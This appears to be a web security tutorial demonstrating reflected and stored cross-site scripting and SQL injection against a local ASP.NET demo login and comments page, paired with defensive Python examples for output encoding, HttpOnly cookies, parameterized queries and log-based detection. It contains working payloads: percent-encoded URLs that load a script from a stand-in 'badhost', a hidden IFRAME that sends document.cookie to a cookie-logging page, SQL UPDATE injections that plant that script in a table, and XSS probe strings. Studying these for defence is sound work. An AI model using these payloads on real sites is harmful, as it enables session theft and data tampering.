Definition: Cross-Site Scripting (XSS) enables malicious attackers to inject client-side script or HTML markup into web pages viewed by other users.
Let's say we have a login page that displays an error message after every unsuccessful attempt. The error message is passed in the query string of the URL and later displayed in a Label control. See Figure 11.
Figure 11
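As an added example (not code from the original article), the Python below models the Label rendering described above. The first function drops the strErr value straight into the markup, the way a Web Forms Label writes its Text property without encoding; the second HTML-encodes the value first, which is what HttpUtility.HtmlEncode does in ASP.NET. The sample URL is the one decoded in Listing 19, and the span id "lblErr" is an assumption made for the example.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the decoded URL from Listing 19, carrying the error text
# in the strErr query-string parameter.
SAMPLE_URL = (
    'http://localhost:1234/Sample/LoginPage.aspx?strErr='
    '"><script src="http://localhost:9997/badhost/maliciousscript.js"></script>'
)


def error_message(url):
    """Read the strErr parameter the way the page reads Request.QueryString."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("strErr", [""])[0]


def render_label_unsafe(message):
    """Mirrors lblErr.Text = strErr (hypothetical control name): the raw
    value lands in the page markup and the browser parses it as HTML."""
    return f'<span id="lblErr">{message}</span>'


def render_label_safe(message):
    """Same output, but the value is HTML-encoded first (quote=True also
    encodes the '"' that the payload uses to break out of an attribute)."""
    return f'<span id="lblErr">{html.escape(message, quote=True)}</span>'


def contains_script_tag(markup):
    """Cheap check used here to show whether the browser would see a <script>."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    msg = error_message(SAMPLE_URL)
    print("unsafe:", render_label_unsafe(msg))
    print("safe:  ", render_label_safe(msg))
```

The encoded value is still shown to the user as text, so the error message keeps working; only its ability to introduce new markup is gone. Encoding at the point of output is the fix that holds regardless of where the value came from (query string, database, cookie).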
Consider this scenario: an anonymous user sends you an email with the following content:
Listing 18
Dear Admin,
There is problem with the login page:
http://localhost:1234/Sample/LoginPage.aspx?strErr=%22%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%6D%61%6C%69%63%69%6F%75%73%73%63%72%69%70%74%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E
Or: "There is a problem with the login page http://localhost:1234/Sample/LoginPage.aspx", with the visible link text pointing to the URL above.
Part of the URL is percent-encoded (each character written as a hexadecimal byte value). When decoded, it becomes:
Listing 19
http://localhost:1234/Sample/LoginPage.aspx?strErr="><script src="http://localhost:9997/badhost/maliciousscript.js"></script>
If we let our guard down and click the link in the email, the browser executes the malicious script. Open the URL and you should see a pop-up message. Shown below is a script embedded in the query string that steals browser cookies.
Listing 20
http://localhost:1234/Sample/LoginPage.aspx?strErr=%3C%73%63%72%69%70%74%3E%76%61%72%20%73%3D%27%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%20%53%52%43%3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%63%6F%6F%6B%69%65%6D%6F%6E%73%74%65%72%2E%61%73%70%78%3F%63%3D%27%2b%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%2b%27%3E%3C%5C%2F%49%46%52%41%4D%45%3E%27%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73%29%3C%2F%73%63%72%69%70%74%3E
When decoded, it looks like this:
Listing 21
http://localhost:1234/Sample/LoginPage.aspx?strErr=<script>var s='<IFRAME style="display:none" SRC=http://localhost:9997/badhost/cookiemonster.aspx?c='%2bescape(document.cookie)%2b'><\/IFRAME>';document.write(s)</script>
The script embeds an IFRAME in the page that points to http://localhost:9997/badhost/cookiemonster.aspx with a query string parameter "c". This parameter holds the values of the cookies created by the "SQLInjection_XSS_Demo" application. To demonstrate this, I created a few cookies on LoginPage.aspx. The cookiemonster.aspx page records all the cookie names and values in CookieJar.txt.
Listing 22
// Creates two demo cookies so the injected script has something to read.
// Neither cookie is marked HttpOnly, so document.cookie exposes both to script.
void FakeCookies()
{
    Response.Cookies["email"].Value = "bryian.tan@mydomain.com";
    Response.Cookies["email"].Expires = DateTime.Now.AddDays(1);
    Response.Cookies["age"].Value = "22";
    Response.Cookies["age"].Expires = DateTime.Now.AddDays(1);
}
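The cookies above are readable by any script running in the page, which is why document.cookie can hand them to cookiemonster.aspx. As an added example (not the article's code), the Python below models the same two cookies with and without the HttpOnly and Secure flags and shows what a script would be able to read in each case. In ASP.NET the equivalent is HttpCookie.HttpOnly and HttpCookie.Secure on each cookie, or httpOnlyCookies="true" in web.config; the document.cookie model is a simplification written for this example.

```python
from http.cookies import SimpleCookie


def fake_cookies_unsafe():
    """Python equivalent of the page's FakeCookies(): values set with no flags."""
    jar = SimpleCookie()
    jar["email"] = "bryian.tan@mydomain.com"
    jar["age"] = "22"
    return jar


def fake_cookies_hardened():
    """Same cookies, marked HttpOnly (script cannot read them) and Secure
    (sent only over HTTPS)."""
    jar = SimpleCookie()
    for name, value in (("email", "bryian.tan@mydomain.com"), ("age", "22")):
        jar[name] = value
        jar[name]["httponly"] = True
        jar[name]["secure"] = True
    return jar


def set_cookie_headers(jar):
    """Render the Set-Cookie header values the server would emit."""
    return [morsel.OutputString() for morsel in jar.values()]


def visible_to_document_cookie(jar):
    """Model of what document.cookie exposes: every cookie except those
    flagged HttpOnly. This is the string cookiemonster.aspx receives in 'c'."""
    return "; ".join(
        f"{m.key}={m.value}" for m in jar.values() if not m["httponly"]
    )


if __name__ == "__main__":
    for header in set_cookie_headers(fake_cookies_hardened()):
        print("Set-Cookie:", header)
    print("script can read (unsafe):  ", repr(visible_to_document_cookie(fake_cookies_unsafe())))
    print("script can read (hardened):", repr(visible_to_document_cookie(fake_cookies_hardened())))
```

HttpOnly stops the cookie values from being read, not from being used: an injected script can still make requests that carry the cookies automatically, so the flag is a second layer behind output encoding rather than a replacement for it.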
After opening the above URL, we see the entries below in CookieJar.txt.
Figure 12
So what? What is the attacker going to do with my cookie information? Let's say the page stores some information in the cookies after a successful login attempt. Log in using one of the usernames found in the tbl_users table, then refresh the web page. The page pulls that information out of the cookies and displays it on the page. See below.
Figure 13
Update table with malicious script
We already know the table and column names from the previous example. Open the URL shown in Listing 23 to update the MyComments table with JavaScript that tampers with the cookies: the injected script writes a script tag into the cookie value. Then navigate to the ListComments.aspx page to trigger the script and navigate back to LoginPage.aspx. You should see a popup message "XSS from bad host", which indicates that the script was successfully executed by the browser.
Listing 23
http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments SET Comment = %27<script>c="<script src=\"http://localhost:9997/badhost/maliciousscript.js\"><\/script>"; document.cookie = "email="%2bc;</script> test %27 WHERE id =1 --
Let's append some malicious script to the MyComments table. Open the URL shown below.
Listing 24
http://localhost:1234/Sample/ListComments.aspx?cid=1 %55%50%44%41%54%45%20%4D%79%43%6F%6D%6D%65%6E%74%73%20%53%45%54%20%4E%61%6D%65%3D%27%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%6D%61%6C%69%63%69%6F%75%73%73%63%72%69%70%74%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%20%2D%2D
When decoded, the URL string becomes:
Listing 25
http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments SET Name='<script src="http://localhost:9997/badhost/maliciousscript.js"></script>' --
Refresh the page and we see the popup message shown below. This indicates that the malicious script crafted by the attacker was successfully executed by the browser.
Figure 14
The URL shown below embeds an HTML IFRAME in the page that requests the cookiemonster.aspx page every time a user navigates to ListComments.aspx. Open it, navigate to the ListComments.aspx page, and observe that new content is appended to the CookieJar.txt file without any trace or warning message.
Listing 26
http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments SET Name= '<script>var s="<IFRAME style=display:none SRC=http://localhost:9997/badhost/cookiemonster.aspx?c="%2bescape(document.cookie)%2b"><\/IFRAME>";document.write(s)</script>' --
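The reason a URL can carry an UPDATE statement at all is that ListComments.aspx builds its query by concatenating the cid parameter into the SQL text. As an added example (not the article's code), the Python below reproduces the effect against an in-memory SQLite table and shows the parameterized query that stops it. The table layout and the benign row are constructed for the example; the payload is adapted from Listing 25 with a ';' added, because SQLite, unlike SQL Server, does not accept a second statement after plain whitespace.

```python
import sqlite3

# Constructed payload adapted from Listing 25 (';' added for SQLite).
INJECTED_CID = (
    "1; UPDATE MyComments SET Name='<script src=\"http://localhost:9997/"
    "badhost/maliciousscript.js\"></script>' --"
)


def fresh_db():
    """In-memory stand-in for the demo database with one benign comment."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE MyComments (id INTEGER PRIMARY KEY, Name TEXT, Comment TEXT)")
    db.execute("INSERT INTO MyComments VALUES (1, 'alice', 'hello')")
    db.commit()
    return db


def stored_name(db):
    """Name column of comment 1, i.e. what ListComments.aspx would later render."""
    return db.execute("SELECT Name FROM MyComments WHERE id = 1").fetchone()[0]


def list_comments_vulnerable(db, cid):
    """String concatenation, as in the page's ListComments.aspx: whatever is in
    cid is executed as SQL. executescript runs the whole batch, so the UPDATE
    hidden in the parameter runs too."""
    sql = "SELECT Name, Comment FROM MyComments WHERE id = " + cid
    db.executescript(sql)


def list_comments_safe(db, cid):
    """Parameterized query: cid is bound as a single value, never parsed as SQL.
    The injected string simply fails to match any id and no rows come back."""
    return db.execute(
        "SELECT Name, Comment FROM MyComments WHERE id = ?", (cid,)
    ).fetchall()


def demo():
    """Run both versions against the injected cid and report what was stored."""
    vulnerable_db = fresh_db()
    list_comments_vulnerable(vulnerable_db, INJECTED_CID)
    tampered = stored_name(vulnerable_db)

    safe_db = fresh_db()
    rows = list_comments_safe(safe_db, INJECTED_CID)
    return tampered, rows, stored_name(safe_db)


if __name__ == "__main__":
    tampered, rows, clean = demo()
    print("after concatenated query, Name =", tampered)
    print("parameterized query returned:", rows, "and Name is still", clean)
```

Parameterization closes the door the stored script came through, but the Name column may already hold script from an earlier injection or from an ordinary comment form, so the page that renders comments still needs to HTML-encode what it reads from the table.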
Quick test
Append any of the strings below to the URL of a web page that takes parameters. If you see a pop-up message, the web page is vulnerable to Cross-Site Scripting.
http://localhost:1234/Sample/LoginPage.aspx?strErr="><scrIpt>alert("XSS")</scriPt>
http://localhost:1234/Sample/LoginPage.aspx?strErr=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E
http://localhost:1234/Sample/LoginPage.aspx?strErr=</TITLE><sCRIPT>alert("XSS");</SCRIPt>
http://localhost:1234/Sample/LoginPage.aspx?strErr=<BODY%20ONLOAD=alert("XSS")>
http://localhost:1234/Sample/LoginPage.aspx?strErr="><iFRAME%20SRC="javascript:alert('XSS');"></IFRaME>
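As an added example (not part of the article), the Python below turns the quick test into a defender's check over web server access logs. It percent-decodes each query-string parameter of a request repeatedly until the text stops changing, so the encoded forms in Listings 18, 20 and 24 and a double-encoded value are both reduced to what the browser eventually receives, and flags values containing script tags, iframes, inline event handlers or javascript: URLs, the four shapes the quick-test strings take. The log lines are constructed: the first carries the Listing 18 payload, the next two are variants of the quick-test strings, and the last is a benign request.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Common Log Format lines (IPs and timestamps are made up).
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /Sample/LoginPage.aspx?strErr=%22%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%6D%61%6C%69%63%69%6F%75%73%73%63%72%69%70%74%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /Sample/LoginPage.aspx?strErr=%22%3E%3CscrIpt%3Ealert(%22XSS%22)%3C/scriPt%3E HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /Sample/LoginPage.aspx?strErr=%253CBODY%2520ONLOAD%253Dalert(%2522XSS%2522)%253E HTTP/1.1" 200 512',
    '10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /Sample/LoginPage.aspx?strErr=Invalid%20password HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Heuristic patterns matching the shapes used in the quick test above.
PATTERNS = [
    re.compile(r"<\s*script\b", re.I),              # <script>, any letter case
    re.compile(r"<\s*iframe\b", re.I),              # hidden IFRAME beacons
    re.compile(r"<\s*\w+[^>]*\son\w+\s*=", re.I),   # inline handler, e.g. ONLOAD=
    re.compile(r"javascript\s*:", re.I),            # javascript: URLs
]


def decode_fully(value, limit=3):
    """Percent-decode until the string stops changing (bounded), so a
    double-encoded value is inspected in its final form."""
    for _ in range(limit):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target):
    """Return {parameter: decoded value} for every query parameter that
    matches one of the patterns."""
    hits = {}
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_fully(raw)
        if any(p.search(value) for p in PATTERNS):
            hits[name] = value
    return hits


def scan_log(lines):
    """Return (client_ip, parameter, decoded_value) for each flagged request."""
    alerts = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        for name, value in suspicious_params(match.group(1)).items():
            alerts.append((client_ip, name, value))
    return alerts


if __name__ == "__main__":
    for client_ip, name, value in scan_log(LOG_LINES):
        print(f"{client_ip} {name}={value!r}")
```

The patterns are triage heuristics for log review, not a filter to rely on at the input: they miss other encodings and markup forms, which is why the page's output-encoding problem is fixed at the point where the value is written into HTML rather than by blocking strings on the way in.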